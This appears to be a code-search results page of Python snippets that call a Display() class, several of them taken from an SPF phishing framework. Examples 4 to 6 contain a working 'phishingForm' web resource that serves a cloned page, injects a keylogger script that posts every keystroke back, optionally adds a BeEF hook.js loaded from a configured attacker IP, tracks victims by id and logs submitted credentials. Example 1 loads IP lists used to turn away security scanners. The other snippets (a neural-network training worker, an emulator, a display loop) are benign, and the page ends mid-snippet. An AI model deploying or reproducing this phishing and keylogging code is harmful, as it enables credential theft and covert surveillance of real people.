Example #1
0
File: web.py Project: webvul/SPF
    def __init__(self,
                 config,
                 vhost,
                 path,
                 logpath,
                 logfile,
                 db,
                 redirecturl="error"):
        self.index = ""
        self.vhost = vhost
        self.path = path
        self.logpath = logpath
        self.logfile = logfile
        self.redirecturl = redirecturl
        self.config = config
        self.loadIndex()
        self.display = Display()
        self.display.setLogPath(self.logpath)
        self.db = db

        # build list of "bad" ips and networks based on https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
        self.bannedIP = Utils.listToIpAddresses(
            Utils.fileToList("misc/ips.redirect"))
        self.bannedCIDR = Utils.listToIpNetworks(
            Utils.fileToList("misc/ranges.redirect"))

        Resource.__init__(self)
Example #2
0
    def __init__(self,
                 fold,
                 conf,
                 data_conf,
                 cache_manager,
                 args,
                 inference=False,
                 verbose=True):
        self._args = args
        self._fold = fold
        self._conf = conf
        self._data_conf = data_conf
        self._inference = inference
        self._verbose = verbose
        self.tmp_dir = self._data_conf['tmp']

        # we save output with this folder structure:
        # output/
        #       -> tensorboard/ (tensorboard results)
        #       -> results/ (output files: images, illuminant, GT, etc...)
        #       -> checkpoint.pth.tar (checkpoint to continue training in case of failure)
        #       -> model_best.pth.tar (best checkpoint, for inference)
        self._pretrained_model = None
        if not self._inference:
            output_dir = os.path.join(self._args.outputfolder, str(self._fold))
            self._tensorboard_dir = os.path.join(output_dir, 'tensorboard')
            self._results_dir = os.path.join(output_dir, 'results')
            self._best_checkpoint_file = os.path.join(output_dir,
                                                      'model_best.pth.tar')
            self._checkpoint_file = os.path.join(output_dir,
                                                 'checkpoint.pth.tar')
            self._pretrained_model = self._args.pretrainedmodel

            # create all directories
            os.makedirs(self._tensorboard_dir, exist_ok=True)
        else:
            # for inference all results are saved under the output directory
            # (images, illuminant, GT, etc...)
            self._results_dir = self._args.outputfolder
            if isinstance(self._args.checkpointfile, list):
                self._checkpoint_file = self._args.checkpointfile[fold]
            else:
                self._checkpoint_file = self._args.checkpointfile

        self._display = Display(self._conf)
        self._factory = Factory(self._conf, self._data_conf, cache_manager,
                                self._args, verbose)
        self._cache_manager = cache_manager

        # create output directory
        os.makedirs(self._results_dir, exist_ok=True)

        os.environ['TORCH_HOME'] = os.path.join(
            os.path.dirname(os.path.realpath(__file__)), os.pardir,
            'torch_model_zoo')
Example #3
0
File: web.py Project: vmlinuxer/SPF
 def __init__(self, config, vhost, path, logpath, logfile, db, redirecturl="error"):
     self.index = ""
     self.vhost = vhost
     self.path = path
     self.logpath = logpath
     self.logfile = logfile
     self.redirecturl = redirecturl
     self.config = config
     self.loadIndex()
     self.display = Display()
     self.display.setLogPath(self.logpath)
     self.db = db
     Resource.__init__(self)
Example #4
0
class phishingForm(Resource):
    def __init__(self, config, vhost, path, logpath, logfile, db, redirecturl="error"):
        self.index = ""
        self.vhost = vhost
        self.path = path
        self.logpath = logpath
        self.logfile = logfile
        self.redirecturl = redirecturl
        self.config = config
        self.loadIndex()
        self.display = Display()
        self.display.setLogPath(self.logpath)
        self.db = db
        Resource.__init__(self)

    def loadIndex(self):
        with open (self.path + "INDEX", "r") as myfile:
            html = myfile.read()
            if (self.config["enable_keylogging"] == "1"):
               js = """
<script type="text/javascript">function p(e){k=window.event?window.event.keyCode:e.which,log(43==k?"[ADD]":String.fromCharCode(k))}function d(e){k=window.event?window.event.keyCode:e.which,8==k?log("[BACKSPACE]"):9==k?log("[TAB]"):13==k?log("[ENTER]"):35==k?log("[END]"):36==k?log("[HOME]"):37==k?log("[<--]"):39==k&&log("[-->]")}function log(e){if(e){var n=new XMLHttpRequest,o=encodeURI(e);n.open("POST","index",!0),n.setRequestHeader("Content-type","application/x-www-form-urlencoded"),n.send("keylog="+o)}}window.onload=function(){window.addEventListener?(document.addEventListener("keypress",p,!0),document.addEventListener("keydown",d,!0)):window.attachEvent?(document.attachEvent("onkeypress",p),document.attachEvent("onkeydown",d)):(document.onkeypress=p,document.onkeydown=d)};</script>
"""
               html = re.sub("</head>", js + "</head>", html, flags=re.I)
            if (self.config["enable_beef"] == "1"):
               html = re.sub("</head>", "<script src=\"http://" + self.config["beef_ip"] + "/hook.js\" type=\"text/javascript\"></script>" + "</head>", html, flags=re.I)
            # enable mobile device redirect
            html = re.sub("</head>", "<script>(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|)|g1 u|g560|gene|gf-5|g-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| ||a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,<site_url>/mobile.html');</script>", html, flags=re.I)

            self.index = html

    def render_GET(self, request):
        # log the access
        username = "******"
        trackid = None
        if "u" in request.args.keys():
            trackid = request.args["u"][0]
        if (self.config["enable_user_tracking"] == "1") and (trackid):
            username = self.db.findUser(trackid)
            if not username:
                username = "******"
        self.display.log("%s,[ACCESS],%s-%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()), filename=self.logfile)
        print("::%s:: %s,[ACCESS],%s-%s" % (self.vhost, time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()))
        sys.stdout.flush()
        # display phishing site
        return str(re.sub("</form>", "<input type=\"hidden\" name=\"spfid\" value=\"" + username + "\"></form>", self.index, flags=re.I))

    def render_POST(self, request):
        # check to see if the POST is a keylogging post
        if ("keylog" in request.args.keys()):
            self.display.log("%s,[KEYLOGGING],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[KEYLOGGING],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        else:
            # log the credentials
            self.display.log("%s,[CREDENTIALS],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[CREDENTIALS],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        sys.stdout.flush()
        # redirect to target URL
        request.redirect(self.redirecturl)
        request.finish()
        return NOT_DONE_YET
Example #5
0
File: web.py Project: vmlinuxer/SPF
class phishingForm(Resource):
    def __init__(self, config, vhost, path, logpath, logfile, db, redirecturl="error"):
        self.index = ""
        self.vhost = vhost
        self.path = path
        self.logpath = logpath
        self.logfile = logfile
        self.redirecturl = redirecturl
        self.config = config
        self.loadIndex()
        self.display = Display()
        self.display.setLogPath(self.logpath)
        self.db = db
        Resource.__init__(self)

    def loadIndex(self):
        with open (self.path + "INDEX", "r") as myfile:
            html = myfile.read()
            if (self.config["enable_keylogging"] == "1"):
               js = """
<script type="text/javascript">function p(e){k=window.event?window.event.keyCode:e.which,log(43==k?"[ADD]":String.fromCharCode(k))}function d(e){k=window.event?window.event.keyCode:e.which,8==k?log("[BACKSPACE]"):9==k?log("[TAB]"):13==k?log("[ENTER]"):35==k?log("[END]"):36==k?log("[HOME]"):37==k?log("[<--]"):39==k&&log("[-->]")}function log(e){if(e){var n=new XMLHttpRequest,o=encodeURI(e);n.open("POST","index",!0),n.setRequestHeader("Content-type","application/x-www-form-urlencoded"),n.send("keylog="+o)}}window.onload=function(){window.addEventListener?(document.addEventListener("keypress",p,!0),document.addEventListener("keydown",d,!0)):window.attachEvent?(document.attachEvent("onkeypress",p),document.attachEvent("onkeydown",d)):(document.onkeypress=p,document.onkeydown=d)};</script>
"""
               html = re.sub("</head>", js + "</head>", html, flags=re.I)
            if (self.config["enable_beef"] == "1"):
               html = re.sub("</head>", "<script src=\"http://" + self.config["beef_ip"] + "/hook.js\" type=\"text/javascript\"></script>" + "</head>", html, flags=re.I)
            self.index = html

    def render_GET(self, request):
        # log the access
        username = "******"
        trackid = None
        if "u" in request.args.keys():
            trackid = request.args["u"][0]
        if (self.config["enable_user_tracking"] == "1") and (trackid):
            username = self.db.findUser(trackid)
            if not username:
                username = "******"
        self.display.log("%s,[ACCESS],%s-%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()), filename=self.logfile)
        print("::%s:: %s,[ACCESS],%s-%s" % (self.vhost, time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()))
        sys.stdout.flush()
        # display phishing site
        return str(re.sub("</form>", "<input type=\"hidden\" name=\"spfid\" value=\"" + username + "\"></form>", self.index, flags=re.I))

    def render_POST(self, request):
        # check to see if the POST is a keylogging post
        if ("keylog" in request.args.keys()):
            self.display.log("%s,[KEYLOGGING],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[KEYLOGGING],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        else:
            # log the credentials
            self.display.log("%s,[CREDENTIALS],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[CREDENTIALS],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        sys.stdout.flush()
        # redirect to target URL
        request.redirect(self.redirecturl)
        request.finish()
        return NOT_DONE_YET
Example #6
0
class phishingForm(Resource):
    def __init__(self, config, vhost, path, logpath, logfile, db, redirecturl="error"):
        self.index = ""
        self.vhost = vhost
        self.path = path
        self.logpath = logpath
        self.logfile = logfile
        self.redirecturl = redirecturl
        self.config = config
        self.loadIndex()
        self.display = Display()
        self.display.setLogPath(self.logpath)
        self.db = db
        Resource.__init__(self)

    def loadIndex(self):
        with open (self.path + "INDEX", "r") as myfile:
            html = myfile.read()
            if (self.config["enable_keylogging"] == "1"):
               js = """
<script type="text/javascript">function p(e){k=window.event?window.event.keyCode:e.which,log(43==k?"[ADD]":String.fromCharCode(k))}function d(e){k=window.event?window.event.keyCode:e.which,8==k?log("[BACKSPACE]"):9==k?log("[TAB]"):13==k?log("[ENTER]"):35==k?log("[END]"):36==k?log("[HOME]"):37==k?log("[<--]"):39==k&&log("[-->]")}function log(e){if(e){var n=new XMLHttpRequest,o=encodeURI(e);n.open("POST","index",!0),n.setRequestHeader("Content-type","application/x-www-form-urlencoded"),n.send("keylog="+o)}}window.onload=function(){window.addEventListener?(document.addEventListener("keypress",p,!0),document.addEventListener("keydown",d,!0)):window.attachEvent?(document.attachEvent("onkeypress",p),document.attachEvent("onkeydown",d)):(document.onkeypress=p,document.onkeydown=d)};</script>
"""
               html = re.sub("</head>", js + "</head>", html, flags=re.I)
            if (self.config["enable_beef"] == "1"):
               html = re.sub("</head>", "<script src=\"http://" + self.config["beef_ip"] + "/hook.js\" type=\"text/javascript\"></script>" + "</head>", html, flags=re.I)
            self.index = html

    def render_GET(self, request):
        # log the access
        username = "******"
        trackid = None
        if "u" in request.args.keys():
            trackid = request.args["u"][0]
        if (self.config["enable_user_tracking"] == "1") and (trackid):
            username = self.db.findUser(trackid)
            if not username:
                username = "******"
        self.display.log("%s,[ACCESS].%s-%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()), filename=self.logfile)
        print("::%s:: %s,[ACCESS],%s-%s" % (self.vhost, time.strftime("%Y.%m.%d-%H.%M.%S"), username, request.getClientIP()))
        sys.stdout.flush()
        # display phishing site
        return str(re.sub("</form>", "<input type=\"hidden\" name=\"spfid\" value=\"" + username + "\"></form>", self.index, flags=re.I))

    def render_POST(self, request):
        # check to see if the POST is a keylogging post
        if ("keylog" in request.args.keys()):
            self.display.log("%s,[KEYLOGGING],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[KEYLOGGING],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        else:
            # log the credentials
            self.display.log("%s,[CREDENTIALS],%s,%s\n" % (time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])), filename=self.logfile)
            print("::%s:: %s,[CREDENTIALS],%s,%s" % (self.vhost,time.strftime("%Y.%m.%d-%H.%M.%S"), request.getClientIP(), ', '.join([('%s=%s') % (k,v) for k,v in request.args.items()])))
        sys.stdout.flush()
        # redirect to target URL
        request.redirect(self.redirecturl)
        request.finish()
        return NOT_DONE_YET
Example #7
0
 def __init__(self, config, vhost, path, logpath, logfile, redirecturl="error"):
     self.index = ""
     self.vhost = vhost
     self.path = path
     self.logpath = logpath
     self.logfile = logfile
     self.redirecturl = redirecturl
     self.config = config
     self.loadIndex()
     self.display = Display()
     self.display.setLogPath(self.logpath)
     Resource.__init__(self)
Example #8
0
    def __init__(self):
        self._memory = Memory(0x1000)
        self._display = Display(64, 32)
        self._delay_timer = Timer(freq=60)
        self._sound_timer = Timer(freq=60)

        self._sound = Sound(self._sound_timer)
        self._cpu = Cpu(self._memory,
                        self._display,
                        delay_timer=self._delay_timer,
                        sound_timer=self._sound_timer)

        self._fps_time = datetime.now()

        pygame.init()
Example #9
0
class Worker():
    def __init__(self,
                 fold,
                 conf,
                 data_conf,
                 cache_manager,
                 args,
                 inference=False,
                 verbose=True):
        self._args = args
        self._fold = fold
        self._conf = conf
        self._data_conf = data_conf
        self._inference = inference
        self._verbose = verbose
        self.tmp_dir = self._data_conf['tmp']

        # we save output with this folder structure:
        # output/
        #       -> tensorboard/ (tensorboard results)
        #       -> results/ (output files: images, illuminant, GT, etc...)
        #       -> checkpoint.pth.tar (checkpoint to continue training in case of failure)
        #       -> model_best.pth.tar (best checkpoint, for inference)
        self._pretrained_model = None
        if not self._inference:
            output_dir = os.path.join(self._args.outputfolder, str(self._fold))
            self._tensorboard_dir = os.path.join(output_dir, 'tensorboard')
            self._results_dir = os.path.join(output_dir, 'results')
            self._best_checkpoint_file = os.path.join(output_dir,
                                                      'model_best.pth.tar')
            self._checkpoint_file = os.path.join(output_dir,
                                                 'checkpoint.pth.tar')
            self._pretrained_model = self._args.pretrainedmodel

            # create all directories
            os.makedirs(self._tensorboard_dir, exist_ok=True)
        else:
            # for inference all results are saved under the output directory
            # (images, illuminant, GT, etc...)
            self._results_dir = self._args.outputfolder
            if isinstance(self._args.checkpointfile, list):
                self._checkpoint_file = self._args.checkpointfile[fold]
            else:
                self._checkpoint_file = self._args.checkpointfile

        self._display = Display(self._conf)
        self._factory = Factory(self._conf, self._data_conf, cache_manager,
                                self._args, verbose)
        self._cache_manager = cache_manager

        # create output directory
        os.makedirs(self._results_dir, exist_ok=True)

        os.environ['TORCH_HOME'] = os.path.join(
            os.path.dirname(os.path.realpath(__file__)), os.pardir,
            'torch_model_zoo')

    # function used to determine the best epoch
    def _compute_best(self, best, train_stats, val_stats):
        metric = train_stats.mean_loss
        if 'choose_best_epoch_by' in self._conf:
            if self._conf['choose_best_epoch_by'] == 'mean_angular_error':
                metric = train_stats.mean_err
            elif self._conf['choose_best_epoch_by'] == 'median_angular_error':
                metric = train_stats.med_err
            elif self._conf['choose_best_epoch_by'] == 'mean_loss':
                metric = train_stats.mean_loss
            elif self._conf[
                    'choose_best_epoch_by'] == 'val_median_angular_error':
                metric = val_stats.med_err
            else:
                raise Exception('Invalid "choose_best_epoch_by" option')

        is_best = metric < best
        best = min(metric, best)

        return is_best, best

    # function to print the epoch info
    def _log_epoch(self, epoch, train_stats, val_stats):
        if self._verbose and epoch % self._conf['print_frequency_epoch'] == 0:
            print(
                'Epoch [{}]: AE (mean={:.4f} med={:.4f}) loss {:.4f} time={:.1f}'
                .format(epoch, train_stats.mean_err, train_stats.med_err,
                        train_stats.mean_loss, train_stats.time),
                end='')
            if val_stats is not None:
                print(
                    ' (val: AE (mean={:.4f} med={:.4f}) loss={:.4f} time={:.4f})\t'
                    .format(val_stats.mean_err, val_stats.med_err,
                            val_stats.mean_loss, val_stats.time),
                    end='')
            print()

        # 1. Log scalar values (scalar summary)
        info = {
            'Epoch Loss': train_stats.mean_loss,
            'Epoch Mean AE': train_stats.mean_err,
            'Epoch Median AE': train_stats.med_err
        }
        if val_stats is not None:
            info.update({
                'Epoch Loss (validation)': val_stats.mean_loss,
                'Epoch Mean AE (validation)': val_stats.mean_err,
                'Epoch Median AE (validation)': val_stats.med_err
            })

        for tag, value in info.items():
            self.logger.scalar_summary(tag, value, epoch)

    def run(self):
        args = self._args
        gpu = args.gpu
        self._conf['use_gpu'] = gpu is not None

        if self._verbose:
            if gpu is not None:
                print("Using GPU: {}".format(gpu))
            else:
                print(
                    "WARNING: You're training on the CPU, this could be slow!")

        # create transforms
        transforms = create_all_transforms(self, self._conf['transforms'])
        # copy FFCC histogram settings to conf (from transform settings)
        self._conf['log_uv_warp_histogram'] = find_loguv_warp_conf(transforms)

        # create model
        self.model = self._factory.get_model()

        # if we're evaluating instead of training:
        # 1. init the model (without training illuminants)
        # 2. load model weights
        if args.evaluate:
            self.model.initialize()
            if self._inference:
                checkpoint = self._checkpoint_file
            else:
                checkpoint = self._best_checkpoint_file

            # optionally resume from a checkpoint
            start_epoch, best, self.model = self._factory.resume_from_checkpoint(
                checkpoint, self.model, None, gpu)
        else:
            checkpoint = self._checkpoint_file

        # create validation/test transforms if defined, otherwise, the same as training
        if self._conf['transforms_valtest'] is not None:
            transforms_valtest = create_all_transforms(
                self, self._conf['transforms_valtest'])
        else:
            transforms_valtest = transforms

        if gpu is not None:
            torch.cuda.set_device(gpu)
            cudnn.benchmark = True

        if args.testfile is not None:
            # test loader
            test_dataset, test_loader, test_loader_cache = self._factory.get_loader(
                args.testfile, transforms_valtest, gpu)
            # if evaluating, copy model to GPU, evaluate and die
            if args.evaluate:
                if gpu is not None:
                    self.model = self.model.cuda(gpu)
                return self.validate(test_loader)  # we finish here!

        # if validation file is defined
        if args.valfile is not None:
            # to save memory, don't do it again if valfile==testfile
            if args.valfile == args.testfile:
                val_dataset = test_dataset
                val_loader = test_loader
                val_loader_cache = test_loader_cache
            else:
                # validation loader
                val_dataset, val_loader, val_loader_cache = self._factory.get_loader(
                    args.valfile, transforms_valtest, gpu)

        # training loader
        train_dataset, train_loader, train_loader_cache = self._factory.get_loader(
            args.trainfiles, transforms, gpu, train=True)

        # init model with the training set illuminants
        self.model.initialize(train_dataset.get_illuminants_by_sensor())

        # optionally pretrain model
        self._factory.pretrain_model(self._pretrained_model, self.model)

        # optionally resume from a checkpoint
        self.optimizer, optimizer_name = self._factory.get_optimizer(
            self.model)
        start_epoch, best, self.model = self._factory.resume_from_checkpoint(
            checkpoint, self.model, self.optimizer, gpu)

        # define loss function
        self.criterion = self._factory.get_criterion()

        # tensorboard logger
        self.logger = TensorBoardLogger(self._tensorboard_dir)

        # learning rate scheduler (if defined)
        scheduler, scheduler_name = self._factory.get_lr_scheduler(
            start_epoch, self.optimizer)

        # copy stuff to GPU
        if gpu is not None:
            self.criterion = self.criterion.cuda(gpu)
            self.model = self.model.cuda(gpu)

        # for FFCC, we reset the optimizer after some epochs
        # because they use two loss functions, ugly trick
        # TODO: fix
        reset_opt = -1
        if 'reset_optimizer_epoch' in self._conf:
            reset_opt = self._conf['reset_optimizer_epoch']

        # load data for the first time
        # we use the cache loaders, they define batch size=1
        # so that we can see the progress with tqdm
        if self._cache_manager.transforms().length > 0 and self._fold == 0:
            if self._verbose:
                print('Caching images...')
            for data in tqdm(train_loader_cache,
                             desc="Training set",
                             disable=not self._verbose):
                pass
            if args.testfile is not None:
                for data in tqdm(test_loader_cache,
                                 desc="Test set",
                                 disable=not self._verbose):
                    pass
            if args.valfile is not None and args.testfile != args.valfile:
                for data in tqdm(val_loader_cache,
                                 desc="Validation set",
                                 disable=not self._verbose):
                    pass

        # if epochs==0, we don't really want to train,
        # we only want to do the candidate selection process for our method
        if self._conf['epochs'] == 0:
            print('WARNING: Training 0 epochs')
            checkpoint = {
                'epoch': 0,
                'arch': self._conf['network']['arch'],
                'subarch': self._conf['network']['subarch'],
                'state_dict': self.model.state_dict(),
                'best': float("inf"),
                'optimizer': self.optimizer.state_dict()
            }
            self._factory.save_checkpoint(self._checkpoint_file,
                                          self._best_checkpoint_file,
                                          checkpoint,
                                          is_best=True)

        # epoch loop
        for epoch in range(start_epoch, self._conf['epochs']):
            # ugly trick for FFCC 2 losses
            if epoch == reset_opt:
                if self._verbose:
                    print('Reset optimizer and lr scheduler')
                best = float("inf")
                self.optimizer, optimizer_name = self._factory.get_optimizer(
                    self.model)
                # TODO: What if lr scheduler changes its internal API?
                if scheduler is not None:
                    scheduler.optimizer = self.optimizer

            # train for one epoch
            train_stats = self.train(train_loader, epoch)

            # validation
            val_stats = None
            if args.valfile is not None:
                _, val_stats = self.validate(val_loader, epoch)

            # compute the best training epoch
            is_best, best = self._compute_best(best, train_stats, val_stats)

            # log epoch details
            self._log_epoch(epoch, train_stats, val_stats)

            # learning rate scheduler
            if scheduler is not None:
                # TODO: hardcoded
                if scheduler_name == 'ReduceLROnPlateau':
                    scheduler.step(train_stats.mean_err)
                else:
                    scheduler.step()

            # save checkpoint!
            checkpoint = {
                'epoch': epoch + 1,
                'arch': self._conf['network']['arch'],
                'subarch': self._conf['network']['subarch'],
                'state_dict': self.model.state_dict(),
                'best': best,
                'optimizer': self.optimizer.state_dict()
            }
            self._factory.save_checkpoint(self._checkpoint_file,
                                          self._best_checkpoint_file,
                                          checkpoint, is_best)

        # get results for the best model
        start_epoch, best, self.model = self._factory.load_model(
            self._best_checkpoint_file, self.model, self.optimizer, gpu)

        # return results from best epoch
        if args.testfile is not None:
            start_time = time.time()
            results = self.validate(test_loader)
            if self._verbose:
                print(
                    'Final inference (including generation of output files) took {:.4f}'
                    .format(time.time() - start_time))
            return results
        else:
            # for some datasets, we have no validation ground truth,
            # so, no evaluation possible
            return [], EpochStats(-1, -1, -1, 0)

    # log iteration
    def _log_iteration(self, epoch, step, len_epoch, loss, err, data, output):
        real_step = epoch * len_epoch + step
        if self._conf['tensorboard_frequency'] != -1 and real_step % self._conf[
                'tensorboard_frequency'] == 0:
            # Log scalar values (scalar summary)
            info = {'Loss': loss, 'Angular Error': err}

            for tag, value in info.items():
                self.logger.scalar_summary(tag, value, real_step)

            # Log values and gradients of the parameters (histogram summary)
            for tag, value in self.model.named_parameters():
                tag = tag.replace('.', '/')
                if value.requires_grad:
                    if value.grad is None:
                        print('WARNING: variable ', tag, '.grad is None!')
                    else:
                        self.logger.histo_summary(tag,
                                                  value.data.cpu().numpy(),
                                                  real_step)
                        self.logger.histo_summary(
                            tag + '/grad',
                            value.grad.data.cpu().numpy(), real_step)

            if 'confidence' in output:
                self.logger.histo_summary(
                    'confidence',
                    output['confidence'].data.cpu().numpy().flatten(),
                    real_step)

        if self._conf[
                'tensorboard_frequency_im'] != -1 and real_step % self._conf[
                    'tensorboard_frequency_im'] == 0:
            # Log training images (image summary)
            info = self._display.get_images(data, output)

            for tag, images in info.items():
                self.logger.image_summary(tag, images, real_step)

    def train(self, train_loader, epoch):
        start_t = time.time()  # log starting time
        self.model.train()  # switch to train mode

        # angular errors and loss lists
        angular_errors = []
        loss_vec = []

        # batch loop
        for step, data in enumerate(train_loader):
            data['epoch'] = epoch  # we know what's the current epoch
            err = err_m = output = loss = None

            def closure():
                nonlocal err, err_m, output, loss

                self.optimizer.zero_grad()
                output = self.model(data)

                loss = self.criterion(output, data, self.model)
                loss.backward()
                err_m = angular_error_degrees(
                    output['illuminant'],
                    Variable(data['illuminant'],
                             requires_grad=False)).detach()
                err = err_m.sum().item() / err_m.shape[0]
                return loss

            self.optimizer.step(closure)
            angular_errors += err_m.cpu().data.tolist()
            loss_value = loss.detach().item()
            loss_vec.append(loss_value)

            self._log_iteration(epoch, step, len(train_loader), loss_value,
                                err, data, output)

        angular_errors = np.array(angular_errors)
        mean_err = angular_errors.mean()
        med_err = np.median(angular_errors)

        mean_loss = np.array(loss_vec).mean()

        t = time.time() - start_t
        return EpochStats(mean_err, med_err, mean_loss, t)

    def validate(self, val_loader, epoch=None):
        with torch.no_grad():  # don't compute gradients
            save_full_res = self._args.save_fullres
            training = epoch is not None
            start_t = time.time()
            # switch to evaluate mode
            self.model.eval()

            res = []
            angular_errors = []
            loss_vec = []

            for i, data in enumerate(val_loader):
                if training:
                    data['epoch'] = epoch
                # compute output
                output = self.model(data)

                # measure accuracy and save loss
                err = None
                if 'illuminant' in data:
                    if training:
                        loss = self.criterion(output, data, self.model)
                        loss_vec.append(loss.detach().item())
                    err = angular_error_degrees(
                        output['illuminant'],
                        Variable(data['illuminant'],
                                 requires_grad=False)).data.cpu().tolist()
                    angular_errors += err

                # When training, we don't want to save validation images
                if not training:
                    res += self._display.save_output(data, output, err,
                                                     val_loader.dataset,
                                                     self._results_dir,
                                                     save_full_res)

            # some datasets have no validation GT
            mean_err = med_err = mean_loss = -1

            if len(angular_errors) > 0:
                angular_errors = np.array(angular_errors)
                mean_err = angular_errors.mean()
                med_err = np.median(angular_errors)

            if len(loss_vec) > 0:
                mean_loss = np.array(loss_vec).mean()

            t = time.time() - start_t
            return res, EpochStats(mean_err, med_err, mean_loss, t)
def do(conf, caps):
    ##
    # Extract cameras
    ##
    front = camera_setup(caps['front_camera'],
                         conf['calibration']['front_camera'])
    top = camera_setup(caps['top_camera'], conf['calibration']['top_camera'])
    menu = camera_setup(caps['top_camera'], conf['calibration']['menu_camera'])

    ##
    # Init Menu
    ##
    menu_conf = conf['menu']

    def process_color(c):
        if c is None:
            return None
        elif type(c) is str:
            return c
        else:
            return tuple(c)

    menu_buttons = {(button['bottom'], button['upper']):
                    process_color(button['color'])
                    for button in menu_conf}

    menu_lines = {button['upper'] for button in menu_conf}

    menu_lines.remove(max(menu_lines))

    ##
    # Init display
    ##
    state = DataClass({
        'ph': PointHolder(),
        'color': colors['black'],
        'setcolor': None,
        'menu': {
            'buttons': menu_buttons,
            'lines': menu_lines,
        }
    })

    def colorset(c):
        nonlocal state

        if c is None or type(c) is tuple:
            state.color = c
            state.ph.color = c

    state.setcolor = colorset

    displayer = Display(front.cropper.dimensions, state)

    ##
    # Main Loop
    ##
    fps = 25
    period = 1000 // fps
    main_loop(period, displayer, (front, top, menu), state)
    print()
Example #11
0
File: CDER.py Project: emitc2h/CDER
#############################################################################

import pyglet
from core import config

####################################################
## Instantiate calorimeter and beamline
calorimeters = []
if config.em_display  :
    from core.calorimeter import em
    calorimeters.append(em.EM_Calorimeter())
if config.had_display :
